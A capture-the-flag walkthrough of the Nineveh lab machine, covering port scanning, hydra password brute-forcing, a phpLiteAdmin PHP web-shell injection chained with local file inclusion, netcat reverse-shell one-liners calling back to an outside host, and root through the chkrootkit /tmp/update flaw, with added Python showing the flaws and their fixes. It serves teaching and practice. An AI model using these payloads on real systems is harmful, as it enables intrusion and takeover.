Starting with masscan
# masscan -e tun0 -p1-65535 --rate=1000 10.10.10.43

Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-07-06 05:14:39 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 443/tcp on 10.10.10.43
Discovered open port 80/tcp on 10.10.10.43
Two web ports are open: 80 (plain HTTP) and 443 (HTTPS).
Let's explore port 80 first. To start with, we run gobuster against it.
# gobuster -u http://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.43/
[+] Threads      : 30
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 301,302,307,200,204
=====================================================
/department (Status: 301)
We found one directory, /department. Let's browse it.
A login page. We can try a few common combinations such as admin/admin, guest/guest and admin/password, but none of them work here, so let's look at the page source for anything interesting.
In the source there is a message from the user amrois to admin, asking them to fix the login page.
Although amrois mentions a problem with the login page, it is not obvious from the source what is wrong with it, so I decided to run hydra against it.
The login page returns two different errors, “Invalid username” and “Invalid password”, depending on which part is wrong. That is a username-enumeration weakness: it lets us confirm a valid username first and then attack only the password. A few guesses quickly confirmed that the username is admin. For the password I used hydra as follows, matching on the string “Invalid” so that any response containing it is treated as a failed attempt.
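Why the two different error messages matter, as an added example that is not part of the original write-up: a login check that answers “Invalid username” and “Invalid password” separately, the same check with one generic message, and the enumeration loop an attacker (or hydra with a failure string) effectively runs against the first one. The user table, hashes, function names and candidate list are constructed for the example.

```python
import hashlib
import hmac

# Constructed credential store for the example: username -> sha256(password).
# (Use a real password hash such as bcrypt or argon2 in production code.)
USERS = {"admin": hashlib.sha256(b"1q2w3e4r5t").hexdigest()}
# Compared against when the user does not exist, so unknown and known users
# cost the same amount of work and do not differ in response time either.
DUMMY_HASH = hashlib.sha256(b"dummy").hexdigest()


def _password_ok(username, password):
    digest = hashlib.sha256(password.encode()).hexdigest()
    stored = USERS.get(username, DUMMY_HASH)
    return hmac.compare_digest(stored, digest) and username in USERS


def login_verbose(username, password):
    """Vulnerable: the error text reveals whether the username exists."""
    if username not in USERS:
        return "Invalid username"
    if not _password_ok(username, password):
        return "Invalid password"
    return "OK"


def login_hardened(username, password):
    """Fixed: one generic message for every failure, and the hash comparison
    runs even for unknown users so timing does not leak the same thing."""
    if _password_ok(username, password):
        return "OK"
    return "Invalid username or password"


def enumerate_users(login, candidates):
    """Attacker side: returns the candidates the login oracle confirms as
    existing users, using a throwaway password that is not expected to match.
    Against the verbose check this is exactly what a wordlist run sees."""
    found = []
    for name in candidates:
        if login(name, "definitely-not-the-password") == "Invalid password":
            found.append(name)
    return found


# Constructed wordlist of usernames to probe.
CANDIDATES = ["root", "admin", "guest", "amrois", "test"]
```

Against login_verbose the loop confirms admin without a single correct password; against login_hardened it learns nothing, and the password guessing then has to cover every username as well.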
# hydra -l 'admin' -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
-- snip --
[DATA] attacking http-post-form://10.10.10.43:80//department/login.php:username=^USER^&password=^PASS^:Invalid
[STATUS] 675.00 tries/min, 675 tries in 00:00h, 0 to do in 01:00h, 14343723 active
[STATUS] 684.00 tries/min, 2052 tries in 00:00h, 0 to do in 03:00h, 14342346 active
[http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
-- snip --
We got the password: 1q2w3e4r5t.
Log in as admin with it.
There is only one useful tab, Notes. Clicking it shows the following message.
Have you fixed the login page yet! hardcoded username and password is really bad idea! check your serect folder to get in! figure it out! this is your challenge Improve the db interface. ~amrois
Another message from amrois. He repeats the request and hints that there is a secret folder to find.
Look at the URL for Notes: http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt . A parameter that names a file to load is a classic candidate for local file inclusion (LFI) or remote file inclusion (RFI). We will come back to it later.
That's it for port 80 for now. Let's leave it and move on to port 443.
# gobuster -u https://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -k

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : https://10.10.10.43/
[+] Threads      : 30
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 307,200,204,301,302
=====================================================
/db (Status: 301)
We got a /db folder. Let's browse it.
We see a phpLiteAdmin login page. The page reveals the phpLiteAdmin version, v1.9, and an error line at the top leaks the full filesystem path of the installation. Keep that path; it will matter later.
phpLiteAdmin only asks for a password, so hydra again, this time with an empty username and the HTTPS form module, matching on the failure string “Incorrect password.”:
# hydra -l '' -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password."
-- snip --
[DATA] attacking http-post-forms://10.10.10.43:443//db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password.
[STATUS] 192.00 tries/min, 192 tries in 00:00h, 0 to do in 01:00h, 14344206 active
[STATUS] 185.33 tries/min, 556 tries in 00:00h, 0 to do in 03:00h, 14343842 active
[STATUS] 188.43 tries/min, 1319 tries in 00:00h, 0 to do in 07:00h, 14343079 active
[http-post-form] host: 10.10.10.43   password: password123
Nice, the password is password123. Use it to log in.
If you check searchsploit you will find a remote PHP code injection in phpLiteAdmin v1.9: the database file is written to disk under whatever name you give it, so a database named with a .php extension whose content includes PHP code becomes a PHP file on the server. All it needs is something that will execute it, which is where the LFI on port 80 comes in.
Create a database called ninevehNotes.php, then create a table with one field of type TEXT and use the following as its value (the public exploit sets it as the field's default value):
<?php echo system($_REQUEST["cmd"]); ?>
Now go back to port 80 and use the LFI in manage.php?notes= to include the new database file via the full path leaked by the phpLiteAdmin error earlier, appending a cmd parameter with the command to run.
We got command execution!
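To show why the chain from the LFI in manage.php?notes= and the phpLiteAdmin database trick works, here is an added example that is not code from the write-up and not from phpLiteAdmin. It writes a SQLite database named ninevehNotes.php with the PHP payload in a TEXT field and checks that the payload survives byte-for-byte inside the file, then contrasts an include that trusts the notes parameter with one that canonicalises the path and keeps it inside the notes directory. The directory layout, file names and the demo() wrapper are constructed; on the box the database path is the one leaked by the phpLiteAdmin error.

```python
import os
import sqlite3
import tempfile

# The PHP line from the write-up, stored into the database as a TEXT value.
PAYLOAD = '<?php echo system($_REQUEST["cmd"]); ?>'


def make_php_database(path):
    """Step 1 (phpLiteAdmin side): create the SQLite file at `path`, e.g. a
    file named ninevehNotes.php, with one TEXT field whose default value is
    the PHP payload. Returns the raw bytes of the file that ends up on disk."""
    con = sqlite3.connect(path)
    # DEFAULT values cannot be bound as parameters, so the literal is inlined;
    # the payload contains no single quotes, but escape them anyway.
    con.execute("CREATE TABLE notes (body TEXT DEFAULT '%s')"
                % PAYLOAD.replace("'", "''"))
    con.execute("INSERT INTO notes DEFAULT VALUES")
    con.commit()
    con.close()
    with open(path, "rb") as f:
        return f.read()


def vulnerable_include(notes_dir, notes_param):
    """manage.php-style include with no validation: an absolute path or a
    ../ sequence in the notes parameter escapes notes_dir entirely."""
    path = notes_param if os.path.isabs(notes_param) \
        else os.path.join(notes_dir, notes_param)
    with open(path, "rb") as f:
        return f.read()


def hardened_include(notes_dir, notes_param):
    """Canonicalise the requested path, then insist it stays inside notes_dir
    and names a .txt file; anything else is refused instead of included."""
    base = os.path.realpath(notes_dir)
    path = os.path.realpath(os.path.join(base, notes_param))
    if os.path.commonpath([base, path]) != base or not path.endswith(".txt"):
        raise PermissionError("refusing to include %r" % notes_param)
    with open(path, "rb") as f:
        return f.read()


def demo():
    """Stage a notes directory and a database directory (constructed stand-ins
    for the web root and the phpLiteAdmin data path) and return four checks:
    payload survives in the db file, vulnerable include serves it, hardened
    include refuses it, hardened include still serves the real notes file."""
    with tempfile.TemporaryDirectory() as tmp:
        notes_dir = os.path.join(tmp, "files")
        os.mkdir(notes_dir)
        with open(os.path.join(notes_dir, "ninevehNotes.txt"), "wb") as f:
            f.write(b"legit note")
        db_dir = os.path.join(tmp, "dbdir")
        os.mkdir(db_dir)
        db_path = os.path.join(db_dir, "ninevehNotes.php")

        raw = make_php_database(db_path)
        payload_survives = raw.startswith(b"SQLite format 3") and PAYLOAD.encode() in raw
        vuln_serves_php = PAYLOAD.encode() in vulnerable_include(notes_dir, db_path)
        try:
            hardened_include(notes_dir, db_path)
            hardened_refuses = False
        except PermissionError:
            hardened_refuses = True
        legit_still_works = hardened_include(notes_dir, "ninevehNotes.txt") == b"legit note"
        return payload_survives, vuln_serves_php, hardened_refuses, legit_still_works
```

The SQLite file is binary, but PHP's include() does not care: it scans the bytes for a <?php tag and executes what it finds, which is why the text stored in the table (and again in the CREATE statement kept in sqlite_master) is enough. The hardened resolver is the fix on the manage.php side; the phpLiteAdmin side is fixed by not writing attacker-named files into a path the web server can reach.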
There is also a secure_notes folder (the “secret folder” from the note) containing a single PNG file, nineveh.png.
Save the file and run binwalk on it to see whether it conceals anything.
# binwalk -e nineveh.png

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84            0x54            Zlib compressed data, best compression
2881744       0x2BF8D0        POSIX tar archive (GNU)
There is a tar archive embedded in the image.
# cd _nineveh.png.extracted/
# ls
2BF8D0.tar  54  54.zlib  secret
# cd secret/
# ls
nineveh.priv  nineveh.pub
Nice, a private and a public SSH key.
Let's get a shell first. URL-encode the following and pass it as the cmd parameter of the LFI request above. Make sure a listener (nc -lvnp 4444) is waiting in another terminal.
;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/f
We get a shell as www-data. Now we can use the private key we found. Save it under any name, set its permissions to 400, and SSH to localhost as amrois; the port scan only showed 80 and 443, so SSH has to be reached from inside the box.
www-data@nineveh:/dev/shm$ chmod 400 a.key
www-data@nineveh:/dev/shm$ ssh -i a.key amrois@localhost
Could not create directory '/var/www/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

133 packages can be updated.
66 updates are security updates.

You have mail.
Last login: Mon Jul  3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$ whoami
amrois
We are now amrois.
Next we need a way to root. To start, I searched for files and folders owned by amrois:
amrois@nineveh:~$ find / -user amrois 2> /dev/null
-- snip --
/report
/usr/sbin/report-reset.sh
-- snip --
Among all the results, /report and /usr/sbin/report-reset.sh stand out. Let's check the /report folder.
amrois@nineveh:/report$ ls -lh
total 64K
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:40 report-19-07-06:02:40.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:41 report-19-07-06:02:41.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:42 report-19-07-06:02:42.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:43 report-19-07-06:02:43.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:44 report-19-07-06:02:44.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:45 report-19-07-06:02:45.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:46 report-19-07-06:02:46.txt
-rw-r--r-- 1 amrois amrois 4.8K Jul  6 02:47 report-19-07-06:02:47.txt
Open one of the files and you will see it is the output of chkrootkit. The timestamps in the file names are one minute apart, so something runs chkrootkit on a schedule. I checked whether amrois has a cronjob of its own and found none, so I assumed the job is run by some other user, most likely root.
There is a well-known issue in chkrootkit (0.49 and earlier, CVE-2014-0476): if a file named /tmp/update exists when a scan runs, chkrootkit executes it, with whatever privileges chkrootkit itself has. If root runs the scan, that is code execution as root.
To test this, I created /tmp/update, made it executable (it is run as a command, so it needs the execute bit), and put the following in it:
#!/bin/bash
rm /tmp/gf;mkfifo /tmp/gf;cat /tmp/gf|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/gf
Start a listener and, after at most a minute, a shell comes back:
# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.43] 59452
bash: cannot set terminal process group (30132): Inappropriate ioctl for device
bash: no job control in this shell
root@nineveh:~# whoami
whoami
root
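The root cause of the /tmp/update behaviour, as an added example that is neither from the write-up nor chkrootkit's own code: chkrootkit 0.49 and earlier (CVE-2014-0476) build their list of suspicious files with the unquoted shell line `file_port=$file_port $i`; when file_port is empty, sh parses that as “run $i with file_port= in its environment”, so a file called update in the scanned tmp directory is executed with chkrootkit's privileges. The Python below only stages a scratch directory with an executable update file and runs the vulnerable fragment and the quoted fix over it. The two fragments are reconstructions of the pattern, and the directory, script and marker file are constructed.

```python
import os
import stat
import subprocess
import tempfile

# Reconstruction of the vulnerable pattern: $1 stands in for the tmp
# directory chkrootkit scans. With file_port empty, the unquoted line is
# parsed as the command "$i" with an environment assignment in front of it.
VULNERABLE = r'''
file_port=
for i in "$1/update"; do
    if [ -f "$i" ]; then
        file_port=$file_port $i     # unquoted: becomes a command invocation
    fi
done
'''

# Same loop with the assignment quoted, which is all the upstream fix needs.
FIXED = r'''
file_port=
for i in "$1/update"; do
    if [ -f "$i" ]; then
        file_port="$file_port $i"   # quoted: stays an assignment
    fi
done
'''


def run_scan(fragment):
    """Stage a fake tmp directory containing an executable 'update' that
    drops a marker file, run the given shell fragment over that directory
    (sh -c <fragment> sh <dir>), and report whether 'update' actually ran."""
    with tempfile.TemporaryDirectory() as tmp:
        update = os.path.join(tmp, "update")
        marker = os.path.join(tmp, "marker")
        with open(update, "w") as f:
            # Constructed stand-in for the attacker's /tmp/update.
            f.write("#!/bin/sh\nid -un > '%s'\n" % marker)
        os.chmod(update, os.stat(update).st_mode | stat.S_IXUSR)
        subprocess.run(["sh", "-c", fragment, "sh", tmp], check=True)
        return os.path.exists(marker)


if __name__ == "__main__":
    print("vulnerable fragment executed update:", run_scan(VULNERABLE))
    print("fixed fragment executed update:     ", run_scan(FIXED))
```

The marker only appears for the vulnerable fragment; note that, exactly as on the box, the payload file must carry the execute bit or the shell reports "Permission denied" instead of running it.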
Let's check which cronjob root is running:
root@nineveh:~# crontab -l
*/1 * * * * /root/vulnScan.sh
Indeed. What is in it?
root@nineveh:~# cat /root/vulnScan.sh
cat /root/vulnScan.sh
#!/bin/bash
/usr/bin/chkrootkit > /report/report-`date +%y-%m-%d:%H:%M`.txt
chown amrois:amrois /report/report-`date +%y-%m-%d:%H:%M`.txt
That's all. But wait: why assume? chkrootkit might have been running as some other user entirely. True, I assumed here and it worked out. A more reliable approach is to watch the process list every minute with a small python script, or use a tool like pspy, and see which user actually runs the job before relying on it.
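A minimal version of the “check the process list every minute with a python script” idea, added here as an example (not from the write-up and not pspy): it polls /proc and prints every process that appears between two snapshots together with the uid it runs under, so a once-a-minute job such as the chkrootkit run shows up as uid 0 without guessing. Function names are our own; snapshot() reads the live /proc and returns an empty result where /proc does not exist, and parse_status() works on any /proc/<pid>/status text.

```python
import os
import time


def parse_status(text):
    """Pull the process name and real uid out of a /proc/<pid>/status body."""
    name, uid = None, None
    for line in text.splitlines():
        if line.startswith("Name:"):
            name = line.split(":", 1)[1].strip()
        elif line.startswith("Uid:"):
            uid = int(line.split()[1])          # real uid is the first field
    return name, uid


def snapshot():
    """pid -> (name, uid, cmdline) for every process visible right now.
    Unprivileged users can normally read status and cmdline of any process,
    which is all this needs (mounting /proc with hidepid changes that)."""
    procs = {}
    if not os.path.isdir("/proc"):
        return procs
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open("/proc/%s/status" % entry) as f:
                name, uid = parse_status(f.read())
            with open("/proc/%s/cmdline" % entry, "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue                          # process exited between listdir and open
        procs[int(entry)] = (name, uid, cmdline)
    return procs


def new_processes(before, after):
    """Processes present in `after` but not in `before`, as (pid, name, uid, cmdline)."""
    return [(pid,) + after[pid] for pid in sorted(after) if pid not in before]


def watch(interval=0.2, duration=120):
    """Print each newly seen process for `duration` seconds. A short interval
    matters: a cron job's chkrootkit children live for well under a second."""
    seen = snapshot()
    deadline = time.time() + duration
    while time.time() < deadline:
        time.sleep(interval)
        now = snapshot()
        for pid, name, uid, cmdline in new_processes(seen, now):
            print("pid=%d uid=%s name=%s cmd=%s" % (pid, uid, name, cmdline))
        seen = now


if __name__ == "__main__":
    watch()
```

Run it as amrois for a couple of minutes and the cron-driven chkrootkit run and its children appear with uid=0, which is the confirmation the write-up skipped.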